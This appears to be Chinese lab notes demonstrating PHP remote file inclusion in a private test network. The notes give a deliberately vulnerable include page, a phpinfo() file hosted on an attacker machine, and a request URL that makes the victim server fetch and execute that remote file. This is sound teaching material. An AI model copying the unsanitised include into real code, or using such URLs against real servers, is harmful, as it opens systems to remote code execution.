环境
-
Server2016(受害者)
-
ip:10.9.47.173
-
配置 php.ini
allow_url_fopen = On/Off # 通过远程方式打开文件 allow_url_include = On/Off # 通过远程方式包含文件
-
文件包含页面
<?php $file=@$_GET['filepath']; @include $file; ?>
-
-
攻击者机器 1
ip:10.9.47.90
开启 http 服务供受害者访问
提供被远程包含的文件(1.php)
<?php phpinfo();?>
-
攻击者机器 2 kali
过程
攻击者机器 1 开启 phpstudy,www 目录下放 1.php 文件,保证与受害者的网络连接,受害者可以访问 1.php
kali 访问以下 url,成功访问到文件
http://10.9.47.173/include.php?filepath=http://10.9.47.90/1.php